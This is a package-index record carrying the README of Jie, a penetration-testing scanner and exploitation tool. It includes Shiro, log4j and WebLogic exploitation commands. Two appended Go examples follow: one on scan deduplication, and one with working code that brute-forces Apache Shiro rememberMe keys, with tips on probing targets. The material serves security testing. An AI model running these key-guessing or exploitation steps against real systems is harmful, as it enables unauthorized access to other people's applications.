{"id":18836886,"url":"https://github.com/yhy0/jie","last_synced_at":"2025-04-05T01:06:22.745Z","repository":{"id":144887131,"uuid":"594922017","full_name":"yhy0/Jie","owner":"yhy0","description":"Jie stands out as a comprehensive security assessment and exploitation tool meticulously crafted for web applications. Its robust suite of features encompasses vulnerability scanning, information gathering, and exploitation, elevating it to an indispensable toolkit for both security professionals and penetration testers.(expectations)","archived":false,"fork":false,"pushed_at":"2024-04-12T15:20:54.000Z","size":6246,"stargazers_count":470,"open_issues_count":4,"forks_count":42,"subscribers_count":9,"default_branch":"main","last_synced_at":"2024-04-12T20:46:33.993Z","etag":null,"topics":["apollo-exp","crawler","jie","scan","scanner","security-copilot","shiro-exp","vul","vulnerability","vulnerability-detection","vulnerability-exploitation","vulnerability-scanners"],"latest_commit_sha":null,"homepage":"https://jie.fireline.fun/","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/yhy0.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2023-01-30T02:10:39.000Z","updated_at":"2024-04-15T03:23:27.392Z","dependencies_parsed_at":null,"dependency_job_id":"1fbe440e-8ddc-4e95-b6e3-685fb2fc7260","html_url":"https://github.com/yhy0/Jie","commit_stats":null,"previous_names":[],"tags_count":20,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yhy0%2FJie","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/G
itHub/repositories/yhy0%2FJie/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yhy0%2FJie/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yhy0%2FJie/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/yhy0","download_url":"https://codeload.github.com/yhy0/Jie/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247271528,"owners_count":20911587,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["apollo-exp","crawler","jie","scan","scanner","security-copilot","shiro-exp","vul","vulnerability","vulnerability-detection","vulnerability-exploitation","vulnerability-scanners"],"created_at":"2024-11-08T02:32:40.171Z","updated_at":"2025-04-05T01:06:22.730Z","avatar_url":"https://github.com/yhy0.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"## Jie\n\n\u003e What I have accomplished cannot be reversed\n\n\u003cp align=\"center\"\u003e\n  \u003ca href=\"https://github.com/yhy0/Jie/blob/main/LICENSE\"\u003e\n    \u003cimg alt=\"Release\" src=\"https://img.shields.io/github/license/yhy0/Jie\"/\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://github.com/yhy0/Jie\"\u003e\n    \u003cimg alt=\"Release\" src=\"https://img.shields.io/badge/release-v1.2.0-brightgreen\"/\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://github.com/yhy0/Jie\"\u003e\n    \u003cimg alt=\"GitHub Repo stars\" src=\"https://img.shields.io/github/stars/yhy0/Jie?color=9cf\"/\u003e\n  \u003c/a\u003e\n  \u003ca 
href=\"https://github.com/yhy0/Jie\"\u003e\n    \u003cimg alt=\"GitHub forks\" src=\"https://img.shields.io/github/forks/yhy0/Jie\"/\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://github.com/yhy0/Jie\"\u003e\n    \u003cimg alt=\"GitHub all release\" src=\"https://img.shields.io/github/downloads/yhy0/Jie/total?color=blueviolet\"/\u003e\n  \u003c/a\u003e\n\u003c/p\u003e\n\n\n\n\u003cp align=\"center\"\u003e\n  \u003ca href=\"https://github.com/yhy0/Jie/blob/main/README.md\"\u003eEnglish\u003c/a\u003e •\n  \u003ca href=\"https://github.com/yhy0/Jie/blob/main/README_CN.md\"\u003e中文\u003c/a\u003e •\n\u003c/p\u003e\n\n`The English documentation was generated by GPT3.5`\n\n\n\nAnalyze and scan traffic by using [active crawler mode](https://github.com/Qianlitp/crawlergo) or [passive proxy](https://github.com/lqqyt2423/go-mitmproxy).\n\n**Please read the documentation carefully before using**\n\n## Pre-requisites for use\n- nmap\n- masscan\n- chromium\n\nYou should check whether the above programs exist on your machine before using them\n\n\u003e If you do not want to install nmap and masscan, you can use-nps to specify that port scanning will not be performed and turn off checking\n\n## Active Mode\n\nThree built-in crawler modes are available:\n\n|                             Mode                             | Corresponding Parameter |\n| :----------------------------------------------------------: | ----------------------- |\n| [crawlergo](https://github.com/Qianlitp/crawlergo) Crawler (Headless browser mode crawler) | `--craw c`              |\n| **Default** [katana](https://github.com/projectdiscovery/katana) Crawler (Standard crawling mode using standard go http library to handle HTTP requests/responses) | `--craw k`              |\n| [katana](https://github.com/projectdiscovery/katana) Crawler (Headless browser mode crawler) | `--craw kh`             |\n\nWhen using headless mode, you can specify `--show` to display the crawling process of the browser.\n\nIn 
active mode, you can enter the **Security Copilot** mode by specifying `--copilot`, which will not exit after scanning, making it convenient to view the web results page.\n\n```bash\n./Jie web -t https://public-firing-range.appspot.com/ -p xss -o vulnerability_report.html --copilot\n```\n\nIf no username and password are specified for the web interface, a random password is generated for the default user `yhy` and written to the log. For example:\n\n`INFO [cmd:webscan.go(glob):55] Security Copilot web report authorized:yhy/3TxSZw8t8w`\n\n## Passive Mode (Security Copilot)\n\nThe passive proxy is implemented with [go-mitmproxy](https://github.com/lqqyt2423/go-mitmproxy/).\n\n### Security Copilot\n\nWhy is it called `Security Copilot`? The idea is that this is not just a vulnerability scanner but a comprehensive auxiliary tool.\n\nWith the proxy scanner attached, browse the website once. Even if there are no vulnerabilities, it should report the website's general information (fingerprint, CDN, port information, sensitive information, API paths, subdomains, etc.), which supports further manual exploration and vulnerability discovery, instead of finishing the scan, considering it done, and leaving a manual re-evaluation for later.\n\n### Certificate Download\n\nHTTPS websites under the passive proxy require installing a certificate. The HTTPS certificate logic is compatible with [mitmproxy](https://mitmproxy.org/), and the CA certificate is generated automatically the first time the command is started, at ~/.mitmproxy/mitmproxy-ca-cert.pem. The same directory holds the CA's private key; anyone who obtains it can issue certificates your browser will trust, so keep it private.\n\nInstall the root certificate. 
Installation steps can be found in the Python mitmproxy documentation: [About Certificates](https://docs.mitmproxy.org/stable/concepts-certificates/).\n\n### Start\n\n```bash\n ./Jie  web --listen :9081 --web 9088 --user yhy --pwd 123 --debug\n```\n\nThis will listen on port 9081, and the web interface (SecurityCopilot) will be open on port 9088.\n\nSet the browser's proxy to 9081, or integrate with Burp.\n\n![image-20240101121809597](images/image-20240101121809597.png)\n\n![image-20240101121931631](images/image-20240101121931631.png)\n\n![image-20240101121957058](images/image-20240101121957058.png)\n\n## Basic Usage\n\n### Configuration\n\nSome configurations can be modified through [Jie_config.yaml](./Jie_config.yaml), or through the configuration interface of `http://127.0.0.1:9088/` (changes made in the web interface will be updated in the configuration file in real-time).\n\n`./Jie web -h`\n\n```bash\nFlags:\n      --copilot          Blocking program, go to the default port 9088 to view detailed scan information.\n                         In active mode, specify this parameter to block the program. After scanning, the program will not exit, and you can view information on the web port.\n  -h, --help             help for web\n      --listen string    use proxy resource collector, value is proxy addr, (example: 127.0.0.1:9080).\n                         Proxy address listened to in passive mode, default is 127.0.0.1:9080\n      --np               not run plugin.\n                         Disable all plugins\n  -p, --plugin strings   Vulnerable Plugin, (example: --plugin xss,csrf,sql,dir ...)\n                         Specify the enabled plugins. 
Specify 'all' to enable all plugins.\n      --poc strings      specify the nuclei poc to run, separated by ','(example: test.yml,./test/*).\n                         Custom nuclei vulnerability template address\n      --pwd string       Security Copilot web report authorized pwd.\n                         Web page login password. If not specified, a random password will be generated.\n      --show             specifies whether to show the browser in headless mode.\n                         Whether to display the browser in active scanning mode\n      --user string      Security Copilot web report authorized user, (example: yhy).]\n                         Web page login username, default is yhy (default \"yhy\")\n      --web string       Security Copilot web report port, (example: 9088)].\n                         Web page port, default is 9088 (default \"9088\")\n\nGlobal Flags:\n      --debug           debug\n  -f, --file string     target file\n  -o, --out string      output report file(eg:vulnerability_report.html)\n      --proxy string    proxy, (example: --proxy http://127.0.0.1:8080)\n  -t, --target string   target\n```\n\n### Download and Compile\n\nDownload the corresponding program from [https://github.com/yhy0/Jie/releases/latest](https://github.com/yhy0/Jie/releases/latest). The release binaries are built automatically by **GitHub Actions** from the repository source, which you can verify against the corresponding workflow run, so feel free to use them.\n\n#### Linux/Mac\n\nSimply execute `make` to compile.\n\n#### Windows\n\n```bash\nexport CGO_ENABLED=1;go build -ldflags \"-s -w\" -o Jie main.go\n```\n\n### Integration with Burp\n\n#### Passive-scan-client Plugin (Strongly Recommended)\n\n[passive-scan-client](https://github.com/yhy0/passive-scan-client)\n\n![passive-scan-client](images/passive-scan-client.png)\n\nFreely select which scanner to use via three monitoring switches. 
**Note: JavaScript and CSS should also go through the scanner so that information can be collected from them.**\n\n#### Setting Upstream Proxy in Burp (Not Recommended)\n\n![image-20231011213912055](images/image-20231011213912055.png)\n\nWith Burp's upstream proxy, traffic from the Intruder and Repeater modules also goes through the scanner.\n\nThis sends all traffic from manual testing through the scanner, which may not be ideal; use it as needed.\n\n\n## Features\n\nThe plugins internally judge whether a target has already been scanned, based on the traffic collected passively or actively (TODO: should the scanning plugins be executed in a certain order?).\n\n### Information Gathering\n\n- Website fingerprint information\n- Aggregated display of URLs requested by each website\n- Website domain information: CDN/WAF/cloud, resolution records\n- Automatic JWT secret brute-forcing (TODO: generate the dictionary automatically from the domain name)\n- Sensitive information\n- Active path scanning (bbscan rules with an added fingerprint field: when a fingerprint is known, only the matching rules are scanned, so for example PHP websites are not scanned with Spring Boot rules)\n- Port information\n- Collect domain names, IPs, APIs\n\n### Plugins\n\nSome scans recognize the language environment from the collected fingerprint information, to avoid invoking Java scanning plugins against PHP websites.\n\n#### Directory Structure Scan\n\nThe `scan` directory is the scan plugin library; the plugins in each subdirectory handle a different situation.\n\n-   PerFile: for each URL, including its parameters\n-   PerFolder: for each directory of the URL; the directory is accessed separately\n-   PerServer: for each domain, meaning a target is only scanned once\n\n|        Plugin         |                         Description                          | Default On |                            Scope                             |\n| :-------------------: | :----------------------------------------------------------: | 
:--------: | :----------------------------------------------------------: |\n|          xss          | Semantic analysis, prototype pollution, DOM pollution point propagation analysis |    true    |                           PerFile                            |\n|          sql          | Currently only implements some simple SQL injection detection |    true    |                           PerFile                            |\n|        sqlmap         | Forward traffic to sqlmap via specified sqlmap API for injection detection |   false    |                           PerFile                            |\n|         ssrf          |                                                              |    true    |                           PerFile                            |\n|         jsonp         |                                                              |    true    |                           PerFile                            |\n|          cmd          |                      Command execution                       |    true    |                           PerFile                            |\n|          xxe          |                                                              |    true    |                           PerFile                            |\n|       fastjson        | When a request is detected as json, it is patched with [@a1phaboy](https://socialify.git.ci/a1phaboy/)'s [FastjsonScan](https://socialify.git.ci/a1phaboy/FastjsonScan) scanner to detect fastjson; jackson is not implemented yet |    true    |                           PerFile                            |\n|       bypass403       | [dontgo403](https://github.com/devploit/dontgo403) 403 bypass detection |    true    |                           PerFile                            |\n|         crlf          |                        crlf injection                        |    true    |                          PerFolder                           |\n|          iis          | iis high version short 
filename guessing [iis7.5-10.x-ShortNameFuzz]( |   false    |                          PerFolder                           |\n| nginx-alias-traversal | Directory traversal caused by an Nginx alias misconfiguration [nginx](https://github.com/vulhub/vulhub/blob/6a142caa19620bffa4cda9989697afd5b4136c87/nginx/insecure-configuration/README.md) |    true    |                          PerFolder                           |\n|         log4j         | log4j vulnerability detection, currently only tests request headers |    true    |                          PerFolder                           |\n|        bbscan         | [bbscan](https://github.com/lijiejie/bbscan) rule directory scan |    true    | PerFolder\u003cbr /\u003ePerServer (for rules that specify the root directory) |\n|       portScan        | Use [naabu](https://github.com/projectdiscovery/naabu) to scan Top 1000 ports, then use [fingerprintx](https://github.com/praetorian-inc/fingerprintx) to identify services |   false    |                          PerServer                           |\n|         brute         | If service brute-forcing is enabled, credentials are brute-forced against the services identified by portScan |            |                          PerServer                           |\n|        nuclei         | Integrated [nuclei](https://github.com/projectdiscovery/nuclei) |   false    |                          PerServer                           |\n|        archive        | Utilize https://web.archive.org/ to obtain historical URL links (with parameters) and then scan them |    true    |                          PerServer                           |\n|          poc          | poc module written in Go for detection. The poc module relies on fingerprint recognition, and scanning will only occur when the corresponding fingerprint is recognized. 
No longer split into separate plugins |   false    |                          PerServer                           |\n\n### Logical Vulnerabilities TODO\n\nAdd multiple user cookies for authorization detection (it seems better to write such tests as Burp plugins, so there is probably no need to write them here).\n\n\n## Use as a Third-party Library\n\nJie can also be driven from Go code. The example below initializes the configuration, starts the Security Copilot web report, consumes results from `output.OutChannel` and launches an active scan:\n\n```go\npackage main\n\nimport (\n    \"github.com/logrusorgru/aurora\"\n    \"github.com/yhy0/Jie/SCopilot\"\n    \"github.com/yhy0/Jie/conf\"\n    \"github.com/yhy0/Jie/crawler\"\n    \"github.com/yhy0/Jie/pkg/mode\"\n    \"github.com/yhy0/Jie/pkg/output\"\n    \"github.com/yhy0/logging\"\n    \"net/url\"\n)\n\n/**\n  @author: yhy\n  @since: 2023/12/28\n  @desc: //TODO\n**/\n\nfunc lib() {\n    logging.Logger = logging.New(conf.GlobalConfig.Debug, \"\", \"Jie\", true)\n    conf.Init()\n    conf.GlobalConfig.Http.Proxy = \"\"\n    conf.GlobalConfig.WebScan.Craw = \"k\"\n    conf.GlobalConfig.WebScan.Poc = nil\n    conf.GlobalConfig.Reverse.Host = \"https://dig.pm/\"\n    conf.GlobalConfig.Passive.WebPort = \"9088\"\n    conf.GlobalConfig.Passive.WebUser = \"yhy\"\n    conf.GlobalConfig.Passive.WebPass = \"123456\" // Remember to change to a strong password\n\n    // Enable all plugins\n    for k := range conf.Plugin {\n        // if k == \"nuclei\" || k == \"poc\" {\n        //     continue\n        // }\n        conf.Plugin[k] = true\n    }\n\n    // Start the Security Copilot web report when a port is configured\n    if conf.GlobalConfig.Passive.WebPort != \"\" {\n        go SCopilot.Init()\n    }\n\n    // Initialize crawler\n    crawler.NewCrawlergo(false)\n\n    // Consume scan results as they are produced\n    go func() {\n        for v := range output.OutChannel {\n            // Show in SCopilot\n            if conf.GlobalConfig.Passive.WebPort != \"\" {\n                parse, err := url.Parse(v.VulnData.Target)\n                if err != nil {\n                    logging.Logger.Errorln(err)\n                    continue\n                }\n                msg := output.SCopilotData{\n                    Target: v.VulnData.Target,\n     
           }\n\n                if v.Level == \"Low\" {\n                    msg.InfoMsg = []output.PluginMsg{\n                        {\n                            Url:      v.VulnData.Target,\n                            Plugin:   v.Plugin,\n                            Result:   []string{v.VulnData.Payload},\n                            Request:  v.VulnData.Request,\n                            Response: v.VulnData.Response,\n                        },\n                    }\n                } else {\n                    msg.VulMessage = append(msg.VulMessage, v)\n                }\n                output.SCopilot(parse.Host, msg)\n            }\n            // Print every finding to the console once, whether or not the web report is enabled\n            logging.Logger.Infoln(aurora.Red(v.PrintScreen()).String())\n        }\n    }()\n\n    // Run an active scan against the target; findings arrive on output.OutChannel\n    mode.Active(\"http://testphp.vulnweb.com/\", nil)\n}\n\nfunc main() {\n    lib()\n}\n```\n\n## Vulnerability Exploitation (Still in Development, Low Priority)\n\n**Currently under development; even the author has to read the code for help information. Detailed documentation will be written once it is done.**\n\nBecause most vulnerability exploitation tools are written in Java and each requires its own Java version, setting up the environment is cumbersome and frustrating, so Jie has been repositioned as:\n\nJie: A comprehensive and powerful vulnerability scanning and exploitation tool.\n\nThe current version (1.0.0) supports exploitation of the following vulnerabilities:\n\n```shell\nA Powerful security assessment and utilization tools\n\nUsage:\n  Jie [command]\n\nAvailable Commands:\n  apollo      apollo scan \u0026\u0026 exp\n  fastjson    fastjson scan \u0026\u0026 exp\n  help        Help about any command\n  log4j       log4j scan \u0026\u0026 exp\n  other       other scan \u0026\u0026 exp bb:BasicBrute、swagger:Swagger、nat:NginxAliasTraversal、dir:dir)\n  s2          Struts2 scan \u0026\u0026 exp\n  shiro       Shiro scan \u0026\u0026 exp\n  web         Run a web scan task\n  
weblogic    WebLogic scan \u0026\u0026 exp\n\nFlags:\n      --debug           debug\n  -f, --file string     target file\n  -h, --help            help for Jie\n  -o, --out string      output report file(eg:vulnerability_report.html)\n      --proxy string    proxy, (example: --proxy http://127.0.0.1:8080)\n  -t, --target string   target\n\nUse \"Jie [command] --help\" for more information about a command.\n```\n\nFor example, Shiro key vulnerability exploitation:\n\n```bash\n# Without -m, the default is to brute-force the rememberMe key and the gadget chain\nJie shiro -t http://127.0.0.1\n\n# Exploitation with a known key (-k), gadget chain (-g) and CBC key mode (-km)\nJie shiro -t http://127.0.0.1 -m exp -k 213123 -g CCK2 -e spring -km CBC --cmd whoami\n```\n\nVarious tools by other researchers are stitched together here; some of them are credited in the descriptions of the scanning and exploitation modules. If anything is missing, contact me to have it added.\nMore vulnerability exploitation modules will be supported later.\n\nhttps://jie.fireline.fun/\n\n## References\n\n### Crawlers\n\n[crawlergo](https://github.com/Qianlitp/crawlergo)\n\n[katana](https://github.com/projectdiscovery/katana)\n\n\n### Passive Scan Proxy\n\nhttps://github.com/lqqyt2423/go-mitmproxy\n\n### Xss\n\nSemantic analysis, prototype pollution, DOM pollution point propagation analysis\n\nhttps://github.com/w-digital-scanner/w13scan\n\nhttps://github.com/ac0d3r/xssfinder\n\nhttps://github.com/kleiton0x00/ppmap\n\n### SQL Injection\n\nDetection-related code extracted from [sqlmap](https://github.com/sqlmapproject/sqlmap)\n\n### POC\n\nDetection through fingerprint recognition\n\nTODO: stop embedding nuclei's yml files and instead download and update them from the official repository\n\nhttps://github.com/projectdiscovery/nuclei\n\nSome of the POCs in xray are written improperly, causing parsing problems, which need to be corrected.\nFor example:\nresponse.status == 200 \u0026\u0026 response.headers[\"content-type\"] == \"text/css\" \u0026\u0026 
response.body.bcontains(b\"$_GET['css']\")\n\n\ncontent-type should be Content-Type\n\nBut it seems there is a parsing problem.\n\nDo not use xray's POC, only use nuclei's yml files\nTogether with the need for organization to prevent duplicate scanning, nuclei-template's POCs are enough.\n\n### Vulnerability Scanners\n\nhttps://github.com/wrenchonline/glint \n\nhttps://github.com/veo/vscan\n\n### Some Other Vulnerabilities\n\n#### Sensitive Information\n\nhttps://github.com/mazen160/secrets-patterns-db\nhttps://github.com/pingc0y/URLFinder\n\n#### Fastjson\n\nhttps://github.com/a1phaboy/FastjsonScan\n\n\n### Fingerprinting\n\nhttps://github.com/w-digital-scanner/w13scan\n\nhttps://github.com/SleepingBag945/dddd\n\n## License\n\nThis code is distributed under the AGPL-3.0 license. See [LICENSE](https://github.com/yhy0/Jie/blob/main/LICENSE) in this directory.\n\n## Acknowledgments\n\nThanks to the open source works and blogs of various masters, as well as [JetBrains](https://www.jetbrains.com/)' support for a series of easy-to-use IDEs for this project.\n\n![JetBrains Logo (Main) logo](https://resources.jetbrains.com/storage/products/company/brand/logos/jb_beam.svg)\n\n## Star History\n\n[![Star History Chart](https://api.star-history.com/svg?repos=yhy0/Jie\u0026type=Date)](https://star-history.com/#yhy0/Jie\u0026Date)","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fyhy0%2Fjie","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fyhy0%2Fjie","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fyhy0%2Fjie/lists"}
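The Features section of the README above lists the PerFile, PerFolder and PerServer plugin scopes and says each plugin judges from the collected traffic whether it has already scanned a target. The following is an added example of how such scope-keyed deduplication can be implemented; it is illustration code, not Jie's own implementation. The key format (parameter values dropped, sorted parameter names kept), the `Tracker` type and the sample URLs are assumptions made for the example.

```go
package main

import (
	"fmt"
	"net/url"
	"path"
	"sort"
	"strings"
	"sync"
)

// Scope mirrors the three plugin scopes listed for the scan directory.
type Scope int

const (
	PerFile   Scope = iota // one run per path and set of parameter names
	PerFolder              // one run per directory of the URL
	PerServer              // one run per scheme://host[:port]
)

// ScopeKey derives the deduplication key of a request under the given scope. Assumption of
// this example: parameter values are dropped, so /item?id=1 and /item?id=2 share one PerFile
// key, but the sorted set of parameter names stays, since a new parameter is a new injection point.
func ScopeKey(rawURL string, scope Scope) (string, error) {
	u, err := url.Parse(rawURL)
	if err != nil {
		return "", err
	}
	if u.Scheme == "" || u.Host == "" {
		return "", fmt.Errorf("absolute URL required: %q", rawURL)
	}
	server := strings.ToLower(u.Scheme) + "://" + strings.ToLower(u.Host)
	switch scope {
	case PerServer:
		return server, nil
	case PerFolder:
		dir := path.Clean("/" + u.Path) // "/a/b/" -> "/a/b"; "" -> "/"
		if u.Path != "" && !strings.HasSuffix(u.Path, "/") {
			dir = path.Dir(dir) // "/a/b/c.php" -> "/a/b"
		}
		if dir == "/" {
			return server + "/", nil
		}
		return server + dir + "/", nil
	case PerFile:
		names := make([]string, 0, len(u.Query()))
		for name := range u.Query() {
			names = append(names, name)
		}
		sort.Strings(names)
		return server + path.Clean("/"+u.Path) + "?" + strings.Join(names, "&"), nil
	}
	return "", fmt.Errorf("unknown scope %d", scope)
}

// Plugin is a scan plugin together with the scope at which it is deduplicated.
type Plugin struct {
	Name  string
	Scope Scope
}

// Tracker remembers which (plugin, key) pairs have run; passive traffic arrives concurrently.
type Tracker struct {
	mu   sync.Mutex
	seen map[string]struct{}
}

func NewTracker() *Tracker { return &Tracker{seen: make(map[string]struct{})} }

// Dispatch returns the plugins that still need to run for rawURL and marks them as run.
func (t *Tracker) Dispatch(rawURL string, plugins []Plugin) []string {
	t.mu.Lock()
	defer t.mu.Unlock()
	var run []string
	for _, p := range plugins {
		key, err := ScopeKey(rawURL, p.Scope)
		if err != nil {
			continue // relative or unparseable URL: nothing to scan
		}
		id := p.Name + "|" + key
		if _, done := t.seen[id]; done {
			continue
		}
		t.seen[id] = struct{}{}
		run = append(run, p.Name)
	}
	return run
}

func main() {
	// Constructed sample traffic, in the order a passive proxy might see it.
	plugins := []Plugin{{"xss", PerFile}, {"crlf", PerFolder}, {"portScan", PerServer}}
	t := NewTracker()
	for _, u := range []string{"http://testphp.vulnweb.com/listproducts.php?cat=1",
		"http://testphp.vulnweb.com/listproducts.php?cat=2", "http://testphp.vulnweb.com/admin/"} {
		fmt.Printf("%-52s -> %v\n", u, t.Dispatch(u, plugins)) // 2nd URL: same file, nothing runs
	}
}
```

The second URL differs only in a parameter value, so no plugin runs again; the third introduces a new folder, so the PerFile and PerFolder plugins run while the PerServer one stays skipped. A real scanner would also key on the HTTP method and body parameters, which this example leaves out.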
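The `Jie shiro` commands in the Vulnerability Exploitation section above brute-force the rememberMe key before exploiting. The following added example, which is not Jie's code, shows the check underneath in Go: a probe is AES-CBC encrypted under each candidate key and sent as the `rememberMe` cookie, and a Shiro application that cannot decrypt and deserialize it answers with `Set-Cookie: rememberMe=deleteMe`. Both sides are included so it runs offline. The simulated server and the probe marker are constructed for the example; against a real target the probe must be a Java-serialized object the application can deserialize (tools commonly use an empty `SimplePrincipalCollection`), and the simulated server stands in for that deserialization by re-encrypting the known probe and comparing bytes. This covers the CBC mode selected by `-km CBC`; recent Shiro releases default to AES-GCM, which uses a different cookie layout not covered here.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/base64"
	"fmt"
	"net/http"
	"net/http/httptest"
)

// DefaultShiroKey is the AES key that shipped hardcoded in Apache Shiro before 1.2.4.
const DefaultShiroKey = "kPH+bIxk5D2deZiIxcaaaA=="

func blockFor(keyB64 string) (cipher.Block, error) {
	key, err := base64.StdEncoding.DecodeString(keyB64)
	if err != nil {
		return nil, err
	}
	return aes.NewCipher(key)
}

// cbcEncrypt returns IV || AES-CBC(key, PKCS7(plaintext)) for the given IV.
func cbcEncrypt(block cipher.Block, iv, plaintext []byte) []byte {
	n := aes.BlockSize - len(plaintext)%aes.BlockSize
	padded := append(append([]byte{}, plaintext...), bytes.Repeat([]byte{byte(n)}, n)...)
	out := make([]byte, aes.BlockSize+len(padded))
	copy(out, iv)
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out[aes.BlockSize:], padded)
	return out
}

// EncryptRememberMe builds a Shiro-style rememberMe cookie, base64(IV || ciphertext), random IV.
func EncryptRememberMe(keyB64 string, plaintext []byte) (string, error) {
	block, err := blockFor(keyB64)
	if err != nil {
		return "", err
	}
	iv := make([]byte, aes.BlockSize)
	if _, err := rand.Read(iv); err != nil {
		return "", err
	}
	return base64.StdEncoding.EncodeToString(cbcEncrypt(block, iv, plaintext)), nil
}

// KeyAccepted sends one probe cookie. Shiro answers a rememberMe cookie it cannot decrypt or
// deserialize with "Set-Cookie: rememberMe=deleteMe"; no such cookie means the key was accepted.
func KeyAccepted(client *http.Client, target, keyB64 string, probe []byte) (bool, error) {
	cookie, err := EncryptRememberMe(keyB64, probe)
	if err != nil {
		return false, err
	}
	req, err := http.NewRequest(http.MethodGet, target, nil)
	if err != nil {
		return false, err
	}
	req.AddCookie(&http.Cookie{Name: "rememberMe", Value: cookie})
	resp, err := client.Do(req)
	if err != nil {
		return false, err
	}
	defer resp.Body.Close()
	for _, c := range resp.Cookies() {
		if c.Name == "rememberMe" && c.Value == "deleteMe" {
			return false, nil
		}
	}
	return true, nil
}

// NewFakeShiro simulates an application keyed with block. Real Shiro decrypts and deserializes;
// this stand-in re-encrypts the constructed probe under the cookie's IV and accepts an exact match.
func NewFakeShiro(block cipher.Block, probe []byte) *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if c, err := r.Cookie("rememberMe"); err == nil {
			raw, _ := base64.StdEncoding.DecodeString(c.Value)
			if len(raw) < 2*aes.BlockSize || !bytes.Equal(raw, cbcEncrypt(block, raw[:aes.BlockSize], probe)) {
				http.SetCookie(w, &http.Cookie{Name: "rememberMe", Value: "deleteMe", Path: "/"})
			}
		}
		w.Write([]byte("ok"))
	}))
}

func main() {
	probe := []byte("constructed probe, not a real serialized object") // stands in for SimplePrincipalCollection
	block, err := blockFor(DefaultShiroKey)
	if err != nil {
		panic(err)
	}
	srv := NewFakeShiro(block, probe) // the target "application"
	defer srv.Close()
	for _, k := range []string{"2AvVhdsgUs0FSA3SDFAdag==", DefaultShiroKey} { // a wordlist key, then the default
		ok, err := KeyAccepted(srv.Client(), srv.URL, k, probe)
		fmt.Println(k, "accepted:", ok, "err:", err)
	}
}
```

The loop in `main` is the whole brute-force: one request per candidate key, stopping at the first one without a `deleteMe` answer. Expect it to be noisy, since every rejected key leaves a `deleteMe` response in the target's logs, and send the probe only to a path that does not require an existing session.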